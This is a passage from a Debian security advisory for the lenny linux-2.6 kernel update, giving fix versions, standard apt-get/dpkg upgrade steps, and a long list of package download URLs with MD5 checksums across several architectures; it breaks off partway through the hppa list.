interface, limited to amd64, ia64 and powerpc64 flavors in Debian. \n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.26-21lenny3. \n\nFor the oldstable distribution (etch), these problems, where\napplicable, will be fixed in updates to linux-2.6 and linux-2.6.24. \n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux\npackages. \n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support. \nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion. \n\nThe following matrix lists additional source packages that were\nrebuilt for compatibility with or to take advantage of this update:\n\n                                             Debian 5.0 (lenny)\n     user-mode-linux                         2.6.26-1um-2+21lenny3\n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz\n    Size/MD5 checksum:  7743374 ab69790fa702dc6902a48328ed655e17\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc\n    Size/MD5 checksum:     5778 5a4c27a374c304a0f727a6bc8ca107f3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz\n    Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz\n    Size/MD5 checksum:  7739467 c8cd3620be097861ec74ba95738bf627\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc\n    Size/MD5 checksum:     5778 71b62f2c2ce9bf12c5c8c7b1aead68a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz\n    Size/MD5 checksum:  7763646 65572787e140a954f0b5cbc00ce52038\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc\n    Size/MD5 checksum:     5778 3de1d44da4b4d993a2662b458bac2141\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb\n    Size/MD5 checksum:  2690888 80c31909190e7ef5a0b888cd985aefdb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb\n    Size/MD5 checksum: 48683206 b0eacf9609bf144218de5826c134b802\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb\n    Size/MD5 checksum:  1772374 969fd31b2eeb9172960519e484b1450c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb\n    Size/MD5 checksum:  4626604 9dc643ca17ca24bb437f7727e41fa9ef\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb\n    Size/MD5 checksum:   109086 d2d99e3343807acfcec613fe2b0faade\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb\n    Size/MD5 checksum: 48679310 626bdb9481a68d788c3af070bd83972a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb\n    Size/MD5 checksum:  1772624 f3978cd4cbae4410fdd01812ca49314d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb\n    Size/MD5 checksum:   124282 3ef6c6a2c133f85b34e86a9060d59d8e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb\n    Size/MD5 checksum:   109244 949b55283cd8b9ed179b0b3451fdcc10\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb\n    Size/MD5 checksum:  4629852 2881e6e3bea4a10f553cfb6359b05a04\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb\n    Size/MD5 checksum:   108954 f965d54958173c8651d5292164546ee6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb\n    Size/MD5 checksum:  4629238 079c11cad4d2427bf43ae65406dfa295\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb\n    Size/MD5 checksum:   124158 d7bb76a2c77dfac430ea437e61a47c65\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb\n    Size/MD5 checksum:  1768622 002384ba86962914e82a90a7b5252d96\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb\n    Size/MD5 checksum:   124518 4940f30671a058397e8e12df185736b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb\n    Size/MD5 checksum:  2718306 3a5702e13f5771a6c076105a3a574086\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb\n    Size/MD5 checksum:  2684268 6d1015f72a67ceb41f02e8f632a6b377\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb\n    Size/MD5 checksum: 48675436 3714144183dfa64da47107af27c143a8\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:   743134 cf4a7865896e9e113e476aca6cc65ed5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:   743006 47d0012e0502eb92092776e835e0036b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum: 28609290 40877622ce1a766e130fc198e67631d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:   366504 60066c18d1053316f39e16ddde67e13a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:   108558 db2317ea07ec9ea8ded1fd1e999380b3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:   370704 0d938cd26f870cdd1a2ac068ad8738ba\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:  3545962 30082d9aa5156be7116d9dc1761c5f5f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum: 29184354 7086136bc3f0af19907e504b8a68f0e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:   108728 e01aaf461b32767332e50440ca1b8073\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum: 28489518 e43aa4137aaea8225993cd55219ca6e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:   367130 dfc6af330d308a43ed5ba326368eabbc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum: 28488834 6820b322ef5f3c5a604f95d7757f0e97\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:   365698 361caa0394224ff46f8f75587f2d3aff\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:   367346 2498260a6e3837db87b97a78970740b4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum: 28472206 4552e0e14143dbc3111e3b353d3804de\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:   108574 47e3f313c9ac8f071f74a408b7c93d2f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:   370366 60a9815a9a19873c70586dbd32a7dbf0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum: 29295384 435f89962b985d1de69e425bf304d219\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:   371476 de6e1346acc8231c319ec76a607dff2a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:   108446 b0040c54aa8a2b657f4d55a02fc50bc8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:  3612802 fb5c52064b92d844e3bc663654b4de8a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:   108430 5200f39f4bebd0807a179a0812f7c3cc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum: 28592640 21a58865548deda20521de56bd5362e1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum:   367038 e905881cf4ec730fac2657f7fb4f664c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:  3546082 1bad5ef07ae9042c3df480c675475b5f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum: 29184122 0c80f7b5e1387271ef37420e97da962f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb\n    Size/MD5 checksum:   365834 6cc1189d57ac0006204a26e19e1d2536\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:   755446 35d03e320438bced6901f61ad8e111d9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb\n    Size/MD5 checksum: 28472668 bc33990bce302d2a70906deb5d3ae7bb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb\n    Size/MD5 checksum:   108704 134d95bbe8c49b00d91ebb96e864e0ce\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   108706 255f99a00d2d7d1241aeb55cb4941607\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum: 19275592 452896220df1ef20183ce97e5897590d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:  3777462 bc1448c45ba29a99605dc4caf03591cf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:  3721884 d145b6140e015b3ec6149a73d8ab0fb7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   751486 8e754d45a468cbd949d02e21b8f10b3c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   108686 ca630ca6d3e5743197878761a6e32386\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:  3854084 bbac30d36345039e9036fb372d7ffdd0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   390288 fcfc06d7a3e5e9ed3e68396ac6fdd46a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   386658 a82ce6a325c10a22361e10c32171ab8e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   387216 f0e564f52e143b68183373485062b036\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   108578 6f0c584a51282de966fb3f680535edbc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:  3777410 a97413b19da80972bfc433cd1782149c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   751526 3103db650456c14a768e4a1dbcd65a82\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:  1807168 892c524cbc3014e4c6d136af79b51ad0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum: 20912064 b2faa4db19ca1f9bad36db345004bd63\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum: 21064476 0480eeb89071e5773ca76697cc897edf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:  3754412 81f809eb9d8703163a8d626f431af02e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum: 20894650 5866fb12c183a8a34421e58b69199a52\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:  3721852 d964b38118d93b5d26675a73bbb600cb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum: 21064028 5d1655c4936c175e6a91355ab022a9b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   389696 aa7b4b067f01db03132eb9d4d6d58091\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   391906 4f47f5cd839c41a1ab4c7b2f54cd0f2c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   395926 ea1253cda840d49d41e13702efbed02a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   108548 c92d21172898d445763a4d8fd05cbe0d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   108734 3587ae10e018dd195d218d3a124bd06f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum: 19276528 eea793d5e6bc477da5633dd90ab68a80\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:   397146 5d1ac382c997a823a0a003dcb3ba2070\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum: 20894254 a4085dc5c64b1c9248a5063d01195fcd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   108534 70aaa46a803e0e0359f62572d9c3fd47\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum: 20912152 1cfacd064cda0fa03a64985f9fa93ff4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:  3854086 577d66e2d5ad76a18100929016adb4b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb\n    Size/MD5 checksum:  3754410 a6271de66c96f5a97cd4e355da812069\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:   389496 9464058c967a225f838a9fad0aab3612\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb\n    Size/MD5 checksum:  1807208 cf864e620211634cacb9fe349da96e67\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   749514 1b7b54fc5a3c088408fcadb17eced0bf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   362960 e996c77f5d49a6f216b71a9449a55b30\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   108748 6fd11cf124041f35486898948bcd345a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   363278 965b088ffa539bc9b7437963832c4c55\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum: 11720320 f23ec924b931ed33227f3e3b0e017b0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   350880 836aa5293823be9983382878a706b11c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   108786 eec5ef010eb4d265862730eea462735d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum: 12454778 d61744348179cd47e3ea948126aad499\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   108642 0409de8db98786b9cc98fa78491188d9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum: 11422168 0a738e9c8a223035938587231ab29be0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   351962 778ef245efcc634d56f25afa60a4880b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum: 12447084 9ce402f2d3f9231155657e2c10f33510\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   365886 ee6bc34915a84fc025fcc7ce105d1888\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:  4142286 2493399a50d78a16f1946bf572409cd8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   748962 b2b554707ecd14c922ac5e0bc812bf2e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum: 11410256 f34c33699b5aa8c80f4d2cdf27f43d98\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum: 10241948 f6d25d1eee96031b8b0203d0e7711b1d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum: 11728562 9c14add2ef000e7b62c52e7e2b2d8682\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   365840 50aa3ef4b64c3bda32171c302e468e80\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:   368962 b8e3d95e9da32e61398e2b481ea85259\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum:  4138498 7b4f0bf9d70d63d22aa04fd72de9071f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb\n    Size/MD5 checksum: 10253486 07767d4f8e4f038738d9dae099a5e27c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   108596 ee087da9b5e9314d94728c173079d128\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb\n    Size/MD5 checksum:   368146 ac75a805d9a76f9f28fec550f1b3ff62\n\narmel architecture (ARM EABI)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum: 12400530 761c33f67bbe6616cab21192e4256df5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum: 11377936 b692b4724667bfc12aa8e80cac8723f8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum: 11688238 06544e3ce8794e071fc873a2cc1b4e27\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:  9581042 37b21f42a1ee2256f9aa17c092738a61\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   364802 ed63e7a262130ef9bd8711f73152f06f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   368672 4447fc56fa6118d87ad47a721e5bf793\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   337618 3b21371c9423d38e5031724464d01950\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   749306 4361179f0f5572d5b56a7747c3547512\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   749706 acbe317294eeca0f43da9211b726817e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:  4134366 d9461c790b30d017090e74e97f5a3325\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   108712 7a9cc05416f6c06bdd8f388cc3c0c5f9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   108462 7e7adfb769f8cb5b1f48ecf2f5c15ea3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   367112 08975a13584af0230b8e592686573d64\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:   108744 8d645205e1ef21e2759df33d39227a28\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   361902 a389f0082ce6653e7b2a08168787887d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum:  9583098 6acf27fb79f8ddd46f42ff81cb91ea14\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   365012 b7b78539a5da9ef226af3bd8c00f4a27\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb\n    Size/MD5 checksum: 12408468 a9aa31723c34fd0d7c668ce06afa49df\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   367392 c18589de88fbff8bf744b2082fbd0d21\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum: 11373712 a8136ebb88c293b538afd2227605665d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   336788 ca9ea27ae187f347ce1f917708338374\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum: 11682376 96c874e9988ecfe3bf29ab87a59bc800\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:  4138826 9c36123a7336f66315eb00d38455b364\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb\n    Size/MD5 checksum:   108502 c3d8036a8945c598bc45d9703b6b033e\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum: 16329288 5218a1a4f278d7b57b15c28b8484d14b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum: 16329740 